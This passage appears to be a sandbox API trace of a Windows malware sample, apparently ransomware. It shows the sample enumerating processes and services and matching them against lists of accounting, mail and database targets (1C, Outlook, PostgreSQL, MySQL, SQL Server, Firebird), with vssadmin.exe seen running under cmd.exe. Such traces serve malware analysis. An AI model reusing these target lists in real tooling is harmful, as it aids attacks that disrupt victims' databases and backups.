[0034.464] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18c [0034.467] Process32FirstW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0034.467] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0034.468] lstrlenW (lpString="System") returned 6 [0034.468] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0034.468] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0034.468] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0034.468] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0034.468] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0034.468] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0034.469] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0034.469] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0034.469] lstrlenW (lpString="smss.exe") returned 8 [0034.469] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0034.469] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0034.469] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0034.469] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0034.469] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0034.469] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0034.469] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0034.469] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.470] lstrlenW (lpString="csrss.exe") returned 9 [0034.470] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.470] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0034.470] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0034.470] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0034.470] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0034.470] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0034.470] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0034.470] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0034.471] lstrlenW (lpString="wininit.exe") returned 11 [0034.471] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0034.471] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0034.471] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0034.471] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0034.471] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0034.471] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0034.471] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0034.471] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0034.472] lstrlenW (lpString="csrss.exe") returned 9 [0034.472] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0034.472] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0034.472] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0034.472] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0034.472] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0034.472] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0034.472] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0034.473] lstrlenW (lpString="winlogon.exe") returned 12 [0034.473] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0034.473] lstrlenW (lpString="services.exe") returned 12 [0034.473] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0034.474] lstrlenW (lpString="lsass.exe") returned 9 [0034.474] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0034.475] lstrlenW (lpString="lsm.exe") returned 7 [0034.475] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.475] lstrlenW (lpString="svchost.exe") returned 11 [0034.475] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.476] lstrlenW (lpString="svchost.exe") returned 11 [0034.476] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.477] lstrlenW (lpString="svchost.exe") returned 11 [0034.477] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.477] lstrlenW (lpString="svchost.exe") returned 11 [0034.477] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x28, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.478] lstrlenW (lpString="svchost.exe") returned 11 [0034.478] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0034.479] lstrlenW (lpString="audiodg.exe") returned 11 [0034.479] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.479] lstrlenW (lpString="svchost.exe") returned 11 [0034.479] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.480] lstrlenW (lpString="svchost.exe") returned 11 [0034.480] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0034.481] lstrlenW (lpString="dwm.exe") returned 7 [0034.481] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0034.481] lstrlenW (lpString="explorer.exe") returned 12 [0034.481] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0034.482] lstrlenW (lpString="spoolsv.exe") returned 11 [0034.482] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.483] lstrlenW (lpString="taskhost.exe") returned 12 [0034.483] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0034.483] lstrlenW (lpString="svchost.exe") returned 11 [0034.483] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0034.484] lstrlenW (lpString="taskeng.exe") returned 11 [0034.484] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0034.485] lstrlenW (lpString="taskhost.exe") returned 12 [0034.485] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0034.485] lstrlenW (lpString="entrepreneur.exe") returned 16 [0034.485] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0034.486] lstrlenW (lpString="andrew kinds.exe") returned 16 [0034.486] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0034.486] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0034.487] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0034.487] lstrlenW (lpString="educated.exe") returned 12 [0034.487] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0034.488] lstrlenW (lpString="servers.exe") returned 11 [0034.488] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0034.489] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0034.489] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0034.489] lstrlenW (lpString="gbp_chair.exe") returned 13 [0034.489] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0034.550] lstrlenW (lpString="attention infected.exe") returned 22 [0034.550] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0034.550] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0034.551] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0034.551] lstrlenW (lpString="pattern amateur.exe") returned 19 [0034.551] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0034.552] lstrlenW (lpString="referral.exe") returned 12 [0034.552] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0034.568] lstrlenW (lpString="copyingseems.exe") returned 16 [0034.568] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0034.569] lstrlenW (lpString="spin generally.exe") returned 18 [0034.569] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0034.569] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0034.569] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0034.570] lstrlenW (lpString="transmit.exe") returned 12 [0034.570] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0034.571] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0034.571] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0034.572] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0034.572] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0034.572] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0034.572] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0034.573] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0034.573] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0034.574] lstrlenW (lpString="delight.exe") returned 11 [0034.574] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0034.574] lstrlenW (lpString="within enquiry.exe") returned 18 [0034.575] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0034.575] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0034.575] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.576] lstrlenW (lpString="dllhost.exe") returned 11 [0034.576] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0034.576] lstrlenW (lpString="dllhost.exe") returned 11 [0034.577] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0034.577] lstrlenW (lpString="agent1c.exe") returned 11 [0034.577] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0034.578] lstrlenW (lpString="cmd.exe") returned 7 [0034.578] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0034.578] lstrlenW (lpString="conhost.exe") returned 11 [0034.578] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0034.579] lstrlenW (lpString="vssadmin.exe") returned 12 [0034.579] Process32NextW (in: hSnapshot=0x18c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0034.580] CloseHandle (hObject=0x18c) returned 1 [0034.580] Sleep (dwMilliseconds=0x1f4) [0035.390] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720560 [0035.390] EnumServicesStatusExW (in: hSCManager=0x3720560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0035.391] GetLastError () returned 0xea [0035.391] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11e4) returned 0x63e060 [0035.391] EnumServicesStatusExW (in: hSCManager=0x3720560, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x63e060, cbBufSize=0x11e4, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x63e060, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0035.392] CloseServiceHandle (hSCObject=0x3720560) returned 1 [0035.392] lstrlenW (lpString="Appinfo") returned 7 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0035.392] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0035.392] lstrlenW (lpString="AudioSrv") returned 8 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0035.392] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0035.392] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0035.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0035.392] lstrlenW (lpString="BFE") returned 3 [0035.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0035.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0035.393] lstrlenW (lpString="CryptSvc") returned 8 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0035.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0035.393] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0035.393] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0035.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0035.393] lstrlenW (lpString="CscService") returned 10 [0035.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0035.393] lstrcmpiW 